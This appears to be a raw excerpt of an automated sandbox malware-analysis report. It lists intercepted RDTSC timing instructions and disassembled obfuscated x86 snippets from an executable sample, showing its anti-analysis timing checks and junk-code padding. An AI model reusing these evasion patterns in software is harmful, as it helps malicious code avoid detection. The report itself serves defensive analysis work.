Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C61B second address: 120C61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C61F second address: 120C62E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6184CCBA76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F06C second address: 120F072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F072 second address: 120F08E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F6184CCBA7Bh 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120F5F7 second address: 120F67E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 jnp 00007F61848348A7h 0x0000000e jmp 00007F61848348A1h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F6184834898h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2F4Ch], ecx 0x00000035 mov dx, 644Ah 0x00000039 push dword ptr [ebp+122D31EFh] 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F6184834898h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 mov dx, 2A43h 0x0000005d push 1B120825h 0x00000062 pushad 0x00000063 jbe 00007F6184834898h 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b push ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1210A38 second address: 1210A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0014 second address: 6FD0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0018 second address: 6FD001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD001C second address: 6FD0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0022 second address: 6FD0051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6184CCBA88h 0x00000009 sbb cx, D498h 0x0000000e jmp 00007F6184CCBA7Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0051 second address: 6FD00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F61848348A5h 0x0000000f xor ecx, 1A245A36h 0x00000015 jmp 00007F61848348A1h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F61848348A0h 0x00000021 or al, 00000058h 0x00000024 jmp 00007F618483489Bh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push ecx 0x00000032 pop edi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD00B1 second address: 6FD00DE instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6184CCBA84h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD00DE second address: 6FD0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d jmp 00007F618483489Ch 0x00000012 mov ch, 5Bh 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F618483489Ah 0x0000001b mov dword ptr [esp], ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F61848348A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0131 second address: 6FD0152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov eax, 22882787h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [eax+10h] 0x00000010 jmp 00007F6184CCBA7Ah 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0152 second address: 6FD016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD016F second address: 6FD0175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0175 second address: 6FD021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F61848348A6h 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 push esi 0x00000011 jmp 00007F618483489Dh 0x00000016 pop ecx 0x00000017 mov ah, dh 0x00000019 popad 0x0000001a mov esi, dword ptr [759B06ECh] 0x00000020 jmp 00007F61848348A8h 0x00000025 test esi, esi 0x00000027 jmp 00007F61848348A0h 0x0000002c jne 00007F618483579Ah 0x00000032 jmp 00007F61848348A0h 0x00000037 xchg eax, edi 0x00000038 pushad 0x00000039 mov ax, D73Dh 0x0000003d mov ebx, esi 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F618483489Fh 0x00000046 xchg eax, edi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F61848348A2h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD021D second address: 6FD0251 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6184CCBA7Eh 0x0000000c and esi, 4E8A52A8h 0x00000012 jmp 00007F6184CCBA7Bh 0x00000017 popfd 0x00000018 popad 0x00000019 call dword ptr [75980B60h] 0x0000001f mov eax, 75F3E5E0h 0x00000024 ret 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0251 second address: 6FD0257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0257 second address: 6FD025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD025D second address: 6FD0261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0261 second address: 6FD0265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0265 second address: 6FD02C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F61848348A0h 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F618483489Eh 0x00000017 jmp 00007F61848348A5h 0x0000001c popfd 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007F618483489Ah 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F618483489Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02C7 second address: 6FD02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02CB second address: 6FD02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD02D1 second address: 6FD02FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6184CCBA87h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD036E second address: 6FD03B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F618483489Eh 0x00000010 test esi, esi 0x00000012 jmp 00007F61848348A0h 0x00000017 je 00007F61F3193B99h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD03B4 second address: 6FD041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6184CCBA87h 0x00000012 adc eax, 409C3E5Eh 0x00000018 jmp 00007F6184CCBA89h 0x0000001d popfd 0x0000001e mov bx, ax 0x00000021 popad 0x00000022 mov dword ptr [esi], edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, DDCAh 0x0000002b mov ebx, 77190C96h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD041A second address: 6FD0420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0420 second address: 6FD04B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 call 00007F6184CCBA7Ch 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 call 00007F6184CCBA81h 0x0000001e pushfd 0x0000001f jmp 00007F6184CCBA80h 0x00000024 sbb ecx, 4287B648h 0x0000002a jmp 00007F6184CCBA7Bh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [esi+08h], eax 0x00000035 jmp 00007F6184CCBA7Fh 0x0000003a mov dword ptr [esi+0Ch], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6184CCBA85h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04B3 second address: 6FD04E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F618483489Eh 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04E2 second address: 6FD04E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD04E6 second address: 6FD0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0503 second address: 6FD057B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F6184CCBA83h 0x0000000c jmp 00007F6184CCBA83h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [ebx+50h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6184CCBA84h 0x0000001f xor ah, 00000058h 0x00000022 jmp 00007F6184CCBA7Bh 0x00000027 popfd 0x00000028 pushad 0x00000029 movzx ecx, bx 0x0000002c movsx edx, si 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [esi+14h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dx, 242Ah 0x0000003b jmp 00007F6184CCBA7Bh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD057B second address: 6FD0593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0593 second address: 6FD061C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b jmp 00007F6184CCBA87h 0x00000010 mov dword ptr [esi+18h], eax 0x00000013 jmp 00007F6184CCBA86h 0x00000018 mov eax, dword ptr [ebx+58h] 0x0000001b pushad 0x0000001c mov si, 5DFDh 0x00000020 push ecx 0x00000021 pop esi 0x00000022 popad 0x00000023 mov dword ptr [esi+1Ch], eax 0x00000026 jmp 00007F6184CCBA7Bh 0x0000002b mov eax, dword ptr [ebx+5Ch] 0x0000002e jmp 00007F6184CCBA86h 0x00000033 mov dword ptr [esi+20h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F6184CCBA87h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD061C second address: 6FD0674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F61848348A5h 0x0000000b and eax, 7A353A86h 0x00000011 jmp 00007F61848348A1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d jmp 00007F618483489Eh 0x00000022 mov dword ptr [esi+24h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F618483489Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0674 second address: 6FD0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0678 second address: 6FD067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD067E second address: 6FD06AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA87h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD06AC second address: 6FD06DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F618483489Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD06DB second address: 6FD0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0702 second address: 6FD0708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0708 second address: 6FD0738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6184CCBA80h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0738 second address: 6FD0747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0747 second address: 6FD075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6003A second address: 6F6005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C0FAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F6184CCBA7Eh 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6005C second address: 6F60060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60060 second address: 6F60066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60066 second address: 6F6006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F6006C second address: 6F60070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60070 second address: 6F60095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ecx, 73B8C55Fh 0x00000010 pushad 0x00000011 jmp 00007F61848348A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F60C00 second address: 6F60C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 07DEh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB097E second address: 6FB098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB098E second address: 6FB0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9000A second address: 6F90034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 68C6h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F61848348A6h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90034 second address: 6F90041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 7FB9h 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dl, ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9014C second address: 6F90152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90152 second address: 6F90156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90156 second address: 6F90172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F61848348A0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90172 second address: 6F901A4 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F6184CCBA7Eh 0x0000000c popad 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6184CCBA87h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901A4 second address: 6F901AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901AA second address: 6F901AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901AE second address: 6F901B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901B2 second address: 6F901C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6184CCBA7Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F901C9 second address: 6F90221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F618483489Dh 0x00000009 jmp 00007F618483489Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+24h], 00000000h 0x0000001a pushad 0x0000001b jmp 00007F61848348A4h 0x00000020 mov ch, CFh 0x00000022 popad 0x00000023 lock bts dword ptr [edi], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F618483489Fh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90221 second address: 6F9023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F9023E second address: 6F90268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F61F4766A76h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F618483489Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90268 second address: 6F902C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C152h 0x00000007 mov edi, 260BA09Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6184CCBA7Bh 0x00000017 adc ax, 6D4Eh 0x0000001c jmp 00007F6184CCBA89h 0x00000021 popfd 0x00000022 mov eax, 02959D57h 0x00000027 popad 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6184CCBA89h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902C6 second address: 6F902D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
